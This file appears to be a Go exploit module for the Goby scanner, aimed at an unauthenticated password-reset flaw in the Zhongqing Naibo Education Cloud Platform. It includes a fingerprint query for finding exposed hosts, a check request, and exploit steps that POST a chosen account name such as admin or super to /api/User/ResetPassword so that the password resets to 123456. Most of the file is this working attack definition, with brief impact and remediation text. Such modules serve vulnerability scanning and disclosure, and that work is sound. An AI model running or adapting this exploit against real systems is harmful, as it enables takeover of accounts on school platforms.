-
Notifications
You must be signed in to change notification settings - Fork 197
/
ZhongQing_naibo_Education_Cloud_platform_reset_password.go
111 lines (108 loc) · 3.79 KB
/
ZhongQing_naibo_Education_Cloud_platform_reset_password.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "ZhongQing naibo Education Cloud platform reset password",
"Description": "Zhongqing Naboo education cloud platform system is a deep application that supports teaching and research.\\nInformation leakage and unauthorized access exist in the cloud platform system of Zhongqing Naboo Education.The password can be reset to 123456 through the leaked user name.",
"Product": "Beijing Zhongqing Naboo Information Technology Co., Ltd. Zhongqing Naibo Education Cloud Platform System",
"Homepage": "http://www.zqnb.com.cn",
"DisclosureDate": "2021-07-09",
"Author": "[email protected]",
"GobyQuery": "body=\"中庆纳博\"",
"Level": "3",
"Impact": "<p style=\"text-align: justify;\">Information leakage is mainly caused by the negligence of developers or operation and maintenance management personnel. The attacker can further analyze the attack target through the information he/she has mastered, so as to effectively launch the next effective attack.</p><p style=\"text-align: justify;\">The application system does not carry out effective identity verification on the service function page. If the application system does not log in and knows the address of the service function page, it can directly operate the functions under the page, which may cause malicious damage to the application system</p>",
"Recommandation": "<p style=\"text-align: justify;\">1. Delete the affected files to avoid information leakage.</p><p style=\"text-align: justify;\">2. Set up a unified error report page</p><p style=\"text-align: justify;\">3. Authorization of sensitive resources or information</p>",
"References": [
"https://www.pwnwiki.org/index.php?title=%E4%B8%AD%E6%85%B6%E7%B4%8D%E5%8D%9A%E6%95%99%E8%82%B2%E9%9B%B2%E5%B9%B3%E8%87%BA%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%26%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8F%E6%BC%8F%E6%B4%9E"
],
"HasExp": true,
"ExpParams": [
{
"name": "LoginName",
"type": "createSelect",
"value": "super,admin,test",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/api/User/ResetPassword",
"follow_redirect": true,
"header": {
"Content-Type": "application/json;charset=UTF-8",
"Accept": "application/json, text/plain, */*"
},
"data_type": "text",
"data": "{\"loginName\":\"test\"}"
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "contains",
"value": "重置密码成功",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "账号不存在",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/User/ResetPassword",
"follow_redirect": true,
"header": {
"Content-Type": "application/json;charset=UTF-8",
"Accept": "application/json, text/plain, */*"
},
"data_type": "text",
"data": "{\"loginName\":\"{{{LoginName}}}\"}"
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"Unauthorized access"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}